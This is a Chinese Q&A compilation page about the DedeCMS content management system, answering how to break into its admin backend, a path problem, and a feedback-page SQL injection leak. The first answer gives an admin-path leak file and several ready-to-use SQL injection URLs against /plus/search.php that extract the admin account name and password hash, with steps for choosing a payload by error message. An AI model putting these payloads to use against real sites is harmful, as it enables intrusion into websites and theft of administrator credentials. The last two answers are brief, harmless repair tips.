本文目录一览:
- 1、dedecms 的后台怎么爆啊,能告诉我详细一点吗
- 2、使用dedecms系统出现了路径问题,是空间问题还是系统原因?
- 3、网站出现DedeCMS反馈页面SQL注入漏洞,页面异常导致本地路径泄漏怎样解决?
dedecms 的后台怎么爆啊,能告诉我详细一点吗
如果你想找DEDECMS后台路径的话
访问/data/mysql_error_trace.inc 这个文件里有,如果幸运的话 你会看到的。
如果是爆管理账号密码,那么你可以试试以下方式。
/plus/search.php?keyword=11typeArr[`@'`and(SELECT%201%20FROM(select%20count(*),concat(floor(rand(0)*2),(SELECT/*'*/concat(0x5f,userid,0x5f,pwd,0x5f)%20from%20`%23@__admin`%20Limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)]=1
/plus/search.php?keyword=astypeArr%5B111%3D@%60%5C'%60)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+%60%23@__admin%60+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@%60%5C'%60+%5D=a
Safe Alert: Request Error step 2 !
那么直接用下面的exp
/plus/search.php?keyword=astypeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
看结果如果提示
Safe Alert: Request Error step 1 !
那么直接用下面的exp
/plus/search.php?keyword=astypeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
使用dedecms系统出现了路径问题,是空间问题还是系统原因?
那你手动修改一下留言板的指向就可以了。网站在上传时最好已经有可以使用的域名,有的空间商会默认使用它的三级域名来绑定你的网站。
网站出现DedeCMS反馈页面SQL注入漏洞,页面异常导致本地路径泄漏怎样解决?
改下 路径 只要是关于保密的 全部改了 然后更新下补丁 不行了重新安装 然后恢复 数据就好了